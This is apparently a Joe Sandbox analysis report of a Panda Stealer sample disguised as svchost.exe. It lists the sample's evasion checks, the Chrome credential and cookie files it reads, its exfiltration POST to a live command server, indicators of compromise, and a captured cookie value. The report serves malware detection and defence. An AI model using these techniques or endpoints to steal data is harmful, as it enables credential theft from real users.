Edit tour

Windows Analysis Report
svchost.exe

Overview

General Information

Sample Name:	svchost.exe
Analysis ID:	642465
MD5:	f86af47d52c3cd035c137d3a3097d06f
SHA1:	5ec629884fea63bb82e2dffa441dca353d5f80e4
SHA256:	eb977a803d155ea25837fa400dff81e8336746e6ed9f563cfaee92a544104705
Tags:	exe
Infos:

Detection

Panda Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Yara detected Panda Stealer

Hides threads from debuggers

Tries to detect sandboxes and other dynamic analysis tools (window names)

PE file has nameless sections

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks for debuggers (devices)

PE file contains sections with non-standard names

PE / OLE file has an invalid certificate

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

svchost.exe (PID: 2236 cmdline: "C:\Users\user\Desktop\svchost.exe" MD5: F86AF47D52C3CD035C137D3A3097D06F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
Process Memory Space: svchost.exe PID: 2236	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.svchost.exe.fd0000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x165bf2:$s1: }aae/::

HTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: asdqwezxc.ru.xsph.ruContent-Length: 808811Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: asdqwezxc.ru.xsph.ru

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Panda Stealer

Source: Yara match	File source: 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2236, type: MEMORYSTR

System Summary

PE file has nameless sections

Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:

Source: svchost.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.0.svchost.exe.fd0000.0.unpack, type: UNPACKEDPE

Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27

Source: svchost.exe

Static PE information: invalid certificate

Source: svchost.exe	Static PE information: Section: ZLIB complexity 0.9988043607414449
Source: svchost.exe	Static PE information: Section: ZLIB complexity 0.997319647606383
Source: svchost.exe	Static PE information: Section: .micro ZLIB complexity 0.9958825448340471

Source: svchost.exe	Virustotal: Detection: 44%
Source: svchost.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\svchost.exe

File read: C:\Users\user\Desktop\svchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe

File created: C:\Users\user~1\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/4@1/1

Source: C:\Users\user\Desktop\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: svchost.exe, 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Source: svchost.exe

Static file information: File size 1493328 > 1048576

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\svchost.exe

Unpacked PE file: 0.2.svchost.exe.fd0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.micro:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.micro:EW;

Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name:
Source: svchost.exe	Static PE information: section name: .micro

Source: initial sample	Static PE information: section name: entropy: 7.998749454200034
Source: initial sample	Static PE information: section name: entropy: 7.994094496471131
Source: initial sample	Static PE information: section name: entropy: 7.955304346106002
Source: initial sample	Static PE information: section name: .micro entropy: 7.974038627658711

Source: C:\Users\user\Desktop\svchost.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe TID: 5772

Thread sleep count: 95 > 30

Jump to behavior

Source: C:\Users\user\Desktop\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VBoxService.exe
Source: svchost.exe, 00000000.00000002.372634851.00000000011C4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: svchost.exe, 00000000.00000002.373452695.0000000009800000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000000.00000002.372634851.00000000011C4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare
Source: svchost.exe, 00000000.00000002.372634851.00000000011C4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: &VBoxService.exe

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\svchost.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\svchost.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\svchost.exe

Open window title or class name: ollydbg

Source: C:\Users\user\Desktop\svchost.exe	File opened: SIWDEBUG
Source: C:\Users\user\Desktop\svchost.exe	File opened: NTICE
Source: C:\Users\user\Desktop\svchost.exe	File opened: SICE

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\Desktop\svchost.exe	Domain query: asdqwezxc.ru.xsph.ru
Source: C:\Users\user\Desktop\svchost.exe	Network Connect: 141.8.197.42 80			Jump to behavior

Stealing of Sensitive Information

Yara detected Panda Stealer

Source: Yara match	File source: 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2236, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Panda Stealer

Source: Yara match	File source: 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2236, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	22 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Data from Local System	Exfiltration Over Other Network Medium	2 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	12 Software Packing	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
svchost.exe	45%	Virustotal		Browse
svchost.exe	73%	ReversingLabs	Win32.Infostealer.Collest
svchost.exe	100%	Avira	HEUR/AGEN.1215869
svchost.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.svchost.exe.fd0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
a-0019.standard.a-msedge.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.enigmaprotector.com/	0%	URL Reputation	safe
http://www.enigmaprotector.com/openU	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
asdqwezxc.ru.xsph.ru	141.8.197.42	true	false		high
a-0019.standard.a-msedge.net	204.79.197.222	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://asdqwezxc.ru.xsph.ru/collect.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
https://duckduckgo.com/chrome_newtab	FYIQUMILOB.KCJREPTML.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
https://duckduckgo.com/ac/?q=	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
http://www.enigmaprotector.com/	svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high
http://www.enigmaprotector.com/openU	svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.197.42	asdqwezxc.ru.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	642465
Start date and time: 09/06/202214:20:27	2022-06-09 14:20:27 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	svchost.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/4@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, fp.msedge.net, client.wns.windows.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
141.8.197.42	btwGaban.exe	Get hash	malicious	Browse	a0680922.xsph.ru/collect.php
	v8YnxUbz23.exe	Get hash	malicious	Browse	a0620960.xsph.ru/5.exe
	6CQieC3oMC.exe	Get hash	malicious	Browse	a0620960.xsph.ru/5.exe
	Oo8GcnVrGH.exe	Get hash	malicious	Browse	a0620960.xsph.ru/5.exe
	ADNOC RFQ 88556524.xlsx	Get hash	malicious	Browse	a0599932.xsph.ru/GrBwWewiSjoPFvO.exe
	P5dD4xbWeX.exe	Get hash	malicious	Browse	a0568605.xsph.ru/forinstalls2.exe
	294J8weDKq.exe	Get hash	malicious	Browse	a0541862.xsph.ru//getCommand.php?id=VGVzdF85MDI1MTczQw
	KVINC5FNPj.exe	Get hash	malicious	Browse	a0510942.xsph.ru/gate.php
	uZS3kvK3Q6.exe	Get hash	malicious	Browse	a0480986.xsph.ru/api/download.get
	windows.exe	Get hash	malicious	Browse	f0427103.xsph.ru/gate.php
	Xenos (2).exe	Get hash	malicious	Browse	a0458390.xsph.ru/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
a-0019.standard.a-msedge.net	kra2EPuLxH.dll	Get hash	malicious	Browse	204.79.197.222
	ENQ T1214778-08 PDF.exe	Get hash	malicious	Browse	204.79.197.222
	B47A5xWBjY.exe	Get hash	malicious	Browse	204.79.197.222
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.11089.doc	Get hash	malicious	Browse	204.79.197.222
	9WMse5Og7j.dll	Get hash	malicious	Browse	204.79.197.222
	FgnBywuoOZIy4X3Snx.dll	Get hash	malicious	Browse	204.79.197.222
	INVAmp8RV6-KTLH7W-HSU1.htm	Get hash	malicious	Browse	204.79.197.222
	1341ENTXzf.dll	Get hash	malicious	Browse	204.79.197.222
	64556738783_MT103_PDF.exe	Get hash	malicious	Browse	204.79.197.222
	2kAIlnMKyw.exe	Get hash	malicious	Browse	204.79.197.222
	INETCFG.dll	Get hash	malicious	Browse	204.79.197.222
	l6VAmEV8jp.dll	Get hash	malicious	Browse	204.79.197.222
	Credit Advice-$USD.exe	Get hash	malicious	Browse	204.79.197.222
	SecuriteInfo.com.W32.AIDetectNet.01.3222.exe	Get hash	malicious	Browse	204.79.197.222
	4a4KM4LRbl.exe	Get hash	malicious	Browse	204.79.197.222
	A6ezy6eIO3.dll	Get hash	malicious	Browse	204.79.197.222
	SecuriteInfo.com.W32.AIDetectNet.01.28387.exe	Get hash	malicious	Browse	204.79.197.222
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_PDF.exe	Get hash	malicious	Browse	204.79.197.222
	SecuriteInfo.com.W32.AIDetect.malware2.23597.exe	Get hash	malicious	Browse	204.79.197.222
	OAZYF2cETB.exe	Get hash	malicious	Browse	204.79.197.222

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SPRINTHOSTRU	btwGaban.exe	Get hash	malicious	Browse	141.8.197.42
	SdogZVuIUB.exe	Get hash	malicious	Browse	141.8.192.58
	f_000026.exe	Get hash	malicious	Browse	141.8.192.49
	CNJrwvaGi1.exe	Get hash	malicious	Browse	141.8.192.6
	JukfOpQzXe.exe	Get hash	malicious	Browse	141.8.193.236
	https://storage.googleapis.com/f0f8webbex4tgd.appspot.com/g/b/file/d/fR7nRkLhDBxkP.html	Get hash	malicious	Browse	185.251.90.227
	https://storage.googleapis.com/vurqu8znuwcbxj.appspot.com/q/pub/file/0/fileTZGUM8O8o78L.html	Get hash	malicious	Browse	185.185.70.61
	https://storage.googleapis.com/vurqu8znuwcbxj.appspot.com/q/pub/file/0/fileTZGUM8O8o78L.html	Get hash	malicious	Browse	185.185.70.61
	U2116768.lnk	Get hash	malicious	Browse	141.8.192.93
	9EE47D035CC3A062F83063ABB192617C3312CC0308D6A.exe	Get hash	malicious	Browse	141.8.192.31
	K0003-LSA and FFA.doc	Get hash	malicious	Browse	141.8.193.236
	tIH5DUSVGF.exe	Get hash	malicious	Browse	141.8.192.82
	PO306078910pdf.exe	Get hash	malicious	Browse	185.185.69.169
	vbc.exe	Get hash	malicious	Browse	185.185.69.18
	HSBC Payment Advice.exe	Get hash	malicious	Browse	141.8.195.205
	PEGASUSPDA.exe	Get hash	malicious	Browse	141.8.194.39
	DHL DOC 74653898.pif.exe	Get hash	malicious	Browse	141.8.194.39
	PEGASUS TERAPDA.exe	Get hash	malicious	Browse	141.8.194.39
	4ftrWKVpjc.exe	Get hash	malicious	Browse	141.8.198.194
	Ce2bvdH0Eh.exe	Get hash	malicious	Browse	141.8.198.194

Process:	C:\Users\user\Desktop\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\KNWKGREDTLVCKPWLTLYN.PWSW

Download File

Process:	C:\Users\user\Desktop\svchost.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	742
Entropy (8bit):	4.515082317145198
Encrypted:	false
SSDEEP:	12:ZKM31Si2YRiTRrUs/5xcIx4GmsD8UzmHzXi491M:QM3Y/YRAaixcIx4GmsDL6zX+
MD5:	87D6CC6E3E96C4A7A6CC5BD94E8309F5
SHA1:	5345AEDECD074E40FF98271294409B62DE20BB8F
SHA-256:	5AEE4331CA320EFC6B3F6577ED88012748DC49989446BEA0F781C054A8A0D6F2
SHA-512:	13B846C17A697C5ABC9EBA8E3BDF212A21D2F37DFB62F46F584821FBF137D492FDE58394D8327B0465283E0902CE52C474C0DDA2D0BA5DA00BD47590BA51138B
Malicious:	false
Reputation:	low
Preview:	System hash: a251c8eee9770aae32dcd376f5b89c16.Build: 1029702468.Version: 1.11.Build name: gol.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 10 (x64)..AutoFill: 0.Passwords: 0.Cookies: 1.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 8.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\svchost.exe.Start time: Thu Jun 9 16:04:21 2022.Get log time: 7 sec..----------------------------------------------------..

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QOXMUS.LJGRXXYCOP

Download File

Process:	C:\Users\user\Desktop\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	220
Entropy (8bit):	5.748777176436018
Encrypted:	false
SSDEEP:	6:PkopYZ/16NX0/tbD2Pdp9TaMbl/XyXqkxcP/Zv:copYZt4HveaPx4cP/R
MD5:	415BFCFE9CFCF8EA0AFC3C0BB7F45CFA
SHA1:	4673524F4CBEF9891DAF4A8CCA299A9891FC0BFF
SHA-256:	C66AC6A7DDD74C5D3464DE4CBBA4CE47C9E96BE8C1C263DDB31096766D9B2891
SHA-512:	B67A94EEDE699131F6377047344FCE20A3404018BFCAC6FD998133512C906931E21DBB8726BB815EB11CB6B284FEE146EABF579858E3840B45FBD0D3CB00E5E4
Malicious:	false
Reputation:	low
Preview:	.google.com.FALSE./.1.13261763695739820.NID.204=lnU8rUIoxvWmSnStHN12ZO72aUiWVV1axeN4DtOTKTfvcrldjVWnMTIQIS8iJiRN9UHb6IUY-QDONDNofBZR-n0DF-PM3FrKHL6vfmJVykmJ7r1MH14-Wacprxo-dlNZMAV5ps4W2FLalvE0BMvycvUBSFkTfeWy7vzxBOBIFRE.

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\YIIRISLGTNNQOCHOPCL.YLTETORRWUHKSJIX

Download File

Process:	C:\Users\user\Desktop\svchost.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	811064
Entropy (8bit):	7.946070685075506
Encrypted:	false
SSDEEP:	12288:fI4uRQYiMBxezLj95xgIbebxTKVrH7BHyTIRuwo5rNe3O5hmJ1DHMNkxnwlZX9S:fI4uRQJMKzv95x9UIdysRs+YhK1uX9S
MD5:	2A074A819C96D5E0E06F5B9E6F918BC8
SHA1:	CA644A51062C9BF85AC1F74D2C2E0F151B0083A0
SHA-256:	EC261C44DABBEEEF86F83B51326AA872612041C192BADC8DAB399D60B1DD0B1E
SHA-512:	09A615AB62A426840254D58FF2D076745C518FA445F4A5FEBBF1FD92916E6C855E46A5FB0C4810F3BFA871F261DD23B8092C286D8831CCB6801B98A23ADCBA8E
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....lIY.....$L.3.Y@E.!..J..S..^....%....E....C.C.J....^%..d.,....3...[k...z.[..V.....>..yzw..r.[.......dw....9.Z.#...9..~..#.6b..q..=G_/..1..^...oP....{..N.J....{.8.~'.s..G_w.Q._.#.:.r}.\......3\............8...GH=..f.%{.......\....1X~.I.s...... C..?V...ge&........p.....9p....)O........}+..x....`.LB.B..<...........vj.....V....B..=7.r.........8.3}Fv.r>......>....7<.\....._.s......>....N....n.......7Y.f..76...J.p.v.......M..c.1r.y....z.k%..cXo%.....T..B...:Ft............C....q.u<lL..Qn>....!6.B........q.O........d~.C...>*b..[.Wfq5L..-......2X......pm.&.M..(..:%.....8.~. ..OP..n\|~.3.1E.D.Wi...d.cB....V..3.....P......V.\..I$.bLR..G.o+.....k..(..\....@.}...`.......1...l....EU.=u...R...1.+...U....=<b............X..J..>%..~....GEl.}...,...~...v...XZ..............H...M......c/.@A6U9..t...6u......t..6X...; :.dR{..0....c...M(...Mo...+....#.... ..9X~.I

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9889608228976465
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	svchost.exe
File size:	1493328
MD5:	f86af47d52c3cd035c137d3a3097d06f
SHA1:	5ec629884fea63bb82e2dffa441dca353d5f80e4
SHA256:	eb977a803d155ea25837fa400dff81e8336746e6ed9f563cfaee92a544104705
SHA512:	5f39928faa0fb04f2abc80565eea16d3522073768e5acf729619a8d0cc549199826193b2eef1eb8d5dd0c664461522748c5b2c1c3568ffb0a0b851ec29ffc04e
SSDEEP:	24576:nkRRYVc2w2S8gtDXA9Ungu9yAsPRXtgcpOB82BgZlArww2hDpQzKt5pG:kfjvtD6A/yNRXNp+gZlAR2RSzKtu
TLSH:	0B6533D267227107F46E5EF9B3ECE982EF2853364538C0D30BC7E2A5B2877A14A95453
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x42ac1a
Entrypoint Section:
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	24928d256eed9c0ac0a1e2a64ad5d83c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	3/4/2020 10:39:47 AM 3/3/2021 10:39:47 AM
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	AAEE394B1087AC1044A13D09468CDF1E
